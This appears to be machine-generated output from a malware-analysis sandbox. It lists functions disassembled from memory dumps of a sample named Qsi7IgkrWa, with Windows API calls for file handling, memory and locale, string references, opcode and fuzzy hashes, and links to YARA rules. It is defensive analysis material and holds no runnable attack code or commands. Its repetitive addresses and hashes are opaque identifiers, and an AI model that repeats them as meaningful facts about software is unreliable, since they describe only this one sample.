APIs

LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,2DE85006,00000001,?,?), ref: 00BDAFDD

Strings

LCMapStringEx, xrefs: 00BDAF7D, 00BDAF87

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: String
String ID: LCMapStringEx
API String ID: 2568140703-3893581201
Opcode ID: 925839c9a303f17c866f2661730d257dccecb29de17d109ab68e7e4ad9b92813
Instruction ID: 3146de3aa3d5f8f481dd47ee2fc5f745333db06d62e8ba1ec3b445d6446e73a8
Opcode Fuzzy Hash: 925839c9a303f17c866f2661730d257dccecb29de17d109ab68e7e4ad9b92813
Instruction Fuzzy Hash: 09014832544249BBCF029F91DC06DEEBFA2EF08750F054195FE1466271DB368A31EB81

Function 00BDAF0A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00BDA56F), ref: 00BDAF55

Strings

InitializeCriticalSectionEx, xrefs: 00BDAF1B, 00BDAF25

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin
String ID: InitializeCriticalSectionEx
API String ID: 2593887523-3084827643
Opcode ID: 2e0667479c2e16551fad34eb3113cb6a2c5dba894cd7ec2fd7e46c46429b83f4
Instruction ID: 2ad724adb3364065eb49c98c4537ee8981c1ecd92330383d41b3c5184e50a8f6
Opcode Fuzzy Hash: 2e0667479c2e16551fad34eb3113cb6a2c5dba894cd7ec2fd7e46c46429b83f4
Instruction Fuzzy Hash: F9F0B435685248BBCB115F51DC46DADBFE1EF04B11B0041D9FD189B260EF715E109B86

Function 00BDADAF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON

Download Yara Rule

APIs

TlsAlloc.KERNEL32 ref: 00BDADEE

Strings

FlsAlloc, xrefs: 00BDADC0, 00BDADCA

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Alloc
String ID: FlsAlloc
API String ID: 2773662609-671089009
Opcode ID: 806327c86c8007dcb0ec96c0b72587533e49221bec1ce23ff37d50f557044354
Instruction ID: 12215e1298c4a3894325e55c7e06527874f9aee35c59e9cc03438193ae3b35d0
Opcode Fuzzy Hash: 806327c86c8007dcb0ec96c0b72587533e49221bec1ce23ff37d50f557044354
Instruction Fuzzy Hash: 3CE055306812487BC300AB26DC46D3EBBD1CF04B21B0001EAFC04AB350EE305E0086C6

Function 00BCEAE7 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON

Download Yara Rule

APIs

___delayLoadHelper2@8.DELAYIMP ref: 00BCEAF9

Part of subcall function 00BCE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BCE8D0
Part of subcall function 00BCE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BCE8E1

Strings

3Ro, xrefs: 00BCEAE7, 00BCEAF3

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
String ID: 3Ro
API String ID: 1269201914-1492261280
Opcode ID: 964d8a1ca18432ebfdf56df2423d77b5805be8682f29e5ba3e91012906b2a05b
Instruction ID: b2975e1dfff7d63b84efa358328c63db56269d72b0f781cbcde7157f9b06409b
Opcode Fuzzy Hash: 964d8a1ca18432ebfdf56df2423d77b5805be8682f29e5ba3e91012906b2a05b
Instruction Fuzzy Hash: F1B012CB29B0C2FC350462011D82D3701CCC0C1B90330C0AEF420DC092EC808C421431

Function 00BDBBF0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON

Download Yara Rule

APIs

Part of subcall function 00BDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BDBA44,?), ref: 00BDB7E6

IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,00BDBA89,?,00000000), ref: 00BDBC64
GetCPInfo.KERNEL32(00000000,00BDBA89,?,?,?,00BDBA89,?,00000000), ref: 00BDBC77

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CodeInfoPageValid
String ID:
API String ID: 546120528-0
Opcode ID: 7244127b8ee05308b58e9becfdfe8ca58d319a2274e9c6dabbcc8e47949ed94f
Instruction ID: fb11d868983da87c0a093047ee6d3bc3ee100a0ad196f3ab2a5515df126c1946
Opcode Fuzzy Hash: 7244127b8ee05308b58e9becfdfe8ca58d319a2274e9c6dabbcc8e47949ed94f
Instruction Fuzzy Hash: 4651DF74A00245DEDB249F75C881EBAFBE6EF41300F2A44FFD4968B352EB3599458B90

Function 00BB9A74 Relevance: 3.1, APIs: 2, Instructions: 116COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,?,?,?,-00000870,00000000,00000800,?,00BB9A50,?,?,00000000,?,?,00BB8CBC,?), ref: 00BB9BAB
GetLastError.KERNEL32(?,00000000,00BB8411,-00009570,00000000,000007F3), ref: 00BB9BB6

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5f5159c83fe716ce586ecbfec497b229d5a1617ff06154deb16455369d1b677d
Instruction ID: a039710c3b1fe4ea1524616bf89657372901bb47b5e213803c8b3cb0bccc378b
Opcode Fuzzy Hash: 5f5159c83fe716ce586ecbfec497b229d5a1617ff06154deb16455369d1b677d
Instruction Fuzzy Hash: 3141CC316043418FDB34DF25E5849BAB7E6FFD8720F148AADEA9183260D7F0ED448A91

Function 00BDBA27 Relevance: 3.1, APIs: 2, Instructions: 91COMMON

Download Yara Rule

APIs

Part of subcall function 00BD97E5: GetLastError.KERNEL32(?,00BF1030,00BD4674,00BF1030,?,?,00BD3F73,00000050,?,00BF1030,00000200), ref: 00BD97E9
Part of subcall function 00BD97E5: _free.LIBCMT ref: 00BD981C
Part of subcall function 00BD97E5: SetLastError.KERNEL32(00000000,?,00BF1030,00000200), ref: 00BD985D
Part of subcall function 00BD97E5: _abort.LIBCMT ref: 00BD9863

Part of subcall function 00BDBB4E: _abort.LIBCMT ref: 00BDBB80
Part of subcall function 00BDBB4E: _free.LIBCMT ref: 00BDBBB4

Part of subcall function 00BDB7BB: GetOEMCP.KERNEL32(00000000,?,?,00BDBA44,?), ref: 00BDB7E6

_free.LIBCMT ref: 00BDBA9F
_free.LIBCMT ref: 00BDBAD5

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: _free$ErrorLast_abort
String ID:
API String ID: 2991157371-0
Opcode ID: 144d7f3f13cc36417e0ef9d6a1c743f433bb43e3f907a8daeed2bb0f4ca18549
Instruction ID: 0b7034c6284909fa7dc424582d13adf80dc271aaeaa19cb2941e206fe01b6e63
Opcode Fuzzy Hash: 144d7f3f13cc36417e0ef9d6a1c743f433bb43e3f907a8daeed2bb0f4ca18549
Instruction Fuzzy Hash: F9316F31904209EFDB109BA8D441EA9F7E5EF44320F6640DBE4149B3A2FF329D40DB50

Function 00BB1E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00BB1E55

Part of subcall function 00BB3BBA: __EH_prolog.LIBCMT ref: 00BB3BBF

_wcslen.LIBCMT ref: 00BB1EFD

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: 95fec497717c30f18edf5e4524e37d1ad3f817705291e9ee74f7983494192c46
Instruction ID: e97677ebed99cf7106e705e1212ec0ab8407aa34b951455e5c104cb27f6e1de5
Opcode Fuzzy Hash: 95fec497717c30f18edf5e4524e37d1ad3f817705291e9ee74f7983494192c46
Instruction Fuzzy Hash: 703138719042099FCF11DF98C955AEEBBF5EF18300F5008AAE445B7252CB769E10CB60

Function 00BB9DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BB73BC,?,?,?,00000000), ref: 00BB9DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00BB9E70

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: 5a03da814672f1128c68af5f5bfb46371a0b57839ab25ed721bcab07c9cfa20d
Instruction ID: 6b0c007600d8afde9514b667209aaaa091a4eb9cbc03a81b7561c1c8d109fd39
Opcode Fuzzy Hash: 5a03da814672f1128c68af5f5bfb46371a0b57839ab25ed721bcab07c9cfa20d
Instruction Fuzzy Hash: ED21CE31248285AFD714CF39C891ABABBE4EF95704F0849ADF5C587141D3A9E90C9B61

Function 00BB966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00BB9F27,?,?,00BB771A), ref: 00BB96E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00BB9F27,?,?,00BB771A), ref: 00BB9716

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4eebac0aa4f90501f8e8abd392c2ca4697bdf837f0cef10c0e543fc221f86d8a
Instruction ID: 7502b351d63c78030d8b55fab070b6e2dbb493f4daca4475af65d24a97531ee5
Opcode Fuzzy Hash: 4eebac0aa4f90501f8e8abd392c2ca4697bdf837f0cef10c0e543fc221f86d8a
Instruction Fuzzy Hash: 6B21CF71100344AFE3308A65CC89FF7B7DCEB49324F100A59FA96C61D2C7B4A8849A71

Function 00BB9E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00BB9EC7
GetLastError.KERNEL32 ref: 00BB9ED4

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5df547f7e610faa4f08cd3cd61e8e8845dd75aaf8a323b4c21eb0cb72c6edf94
Instruction ID: 63b541c06240503da0e092056d6832f52a89627d5727c408442b30c89aca23ec
Opcode Fuzzy Hash: 5df547f7e610faa4f08cd3cd61e8e8845dd75aaf8a323b4c21eb0cb72c6edf94
Instruction Fuzzy Hash: 28118231600604EBE724CA29C885BF6B7E9EB45370F504AA9E652D3AD0DBF4ED49C660

Function 00BD8E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00BD8E75

Part of subcall function 00BD8E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00BDCA2C,00000000,?,00BD6CBE,?,00000008,?,00BD91E0,?,?,?), ref: 00BD8E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00BF1098,00BB17CE,?,?,00000007,?,?,?,00BB13D6,?,00000000), ref: 00BD8EB1

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 3cf2ea2dbaa51d950caa605ee570b15dff2a0716b2f8987a530dcaa668f4d826
Instruction ID: a5b2263d205bdd1bcc0c6c151d89a87981740e99d5288fff2e67e1b97eab9f49
Opcode Fuzzy Hash: 3cf2ea2dbaa51d950caa605ee570b15dff2a0716b2f8987a530dcaa668f4d826
Instruction Fuzzy Hash: E9F0C232601111B7CB257B25AC05BAFF7E8CFC1B72B2441ABF814AA391FF708D0189A0

Function 00BC109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00BC10AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00BC10B2

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 5163ad4a0ac56053425d16eede30781550c4d1edf8e73d18780a3929060569fb
Instruction ID: 57ba79a46ac7f1a64e4e012f3c68c931f5f706f310cf87384d179b6370c820ec
Opcode Fuzzy Hash: 5163ad4a0ac56053425d16eede30781550c4d1edf8e73d18780a3929060569fb
Instruction Fuzzy Hash: C8E0D832B00185A7CF098BB89C19EEB73DDEA4524431485FEE403F7203F934DE414A60

Function 00BBA4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA501

Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BBA325,?,?,?,00BBA175,?,00000001,00000000,?,?), ref: 00BBA532

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: eec59d21928926426082ddfb9f9f0c7b056be0b27087b766f635dc642d4541a8
Instruction ID: 52f0b68fc79be46e6c9268e37f526a0c7c64d0c0dffbc918c4fda9b9152fd2cb
Opcode Fuzzy Hash: eec59d21928926426082ddfb9f9f0c7b056be0b27087b766f635dc642d4541a8
Instruction Fuzzy Hash: A3F03032240149BBDF116F60DC45FEA37ECEB14785F448091B945D6161DBB1DA94EA50

Function 00BBA1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641,000000FF), ref: 00BBA1F1

Part of subcall function 00BBBB03: _wcslen.LIBCMT ref: 00BBBB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BB977F,?,?,00BB95CF,?,?,?,?,?,00BE2641), ref: 00BBA21F

Memory Dump Source

Source File: 00000000.00000002.1657899915.0000000000BB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000000.00000002.1657885702.0000000000BB0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657928832.0000000000BE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BEE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000BF5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1657947584.0000000000C12000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C13000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1658002305.0000000000C58000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bb0000_Qsi7IgkrWa.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: 9955e40060505cc61ad795e6e0bd31c696cd15b601b224ce0b9407a75ced90b8
Instruction ID: a4dac86142e2c50d4f66d602f1d64089f3c02318c9685e150eb2dff3d9e4fa17
Opcode Fuzzy Hash: 9955e40060505cc61ad795e6e0bd31c696cd15b601b224ce0b9407a75ced90b8
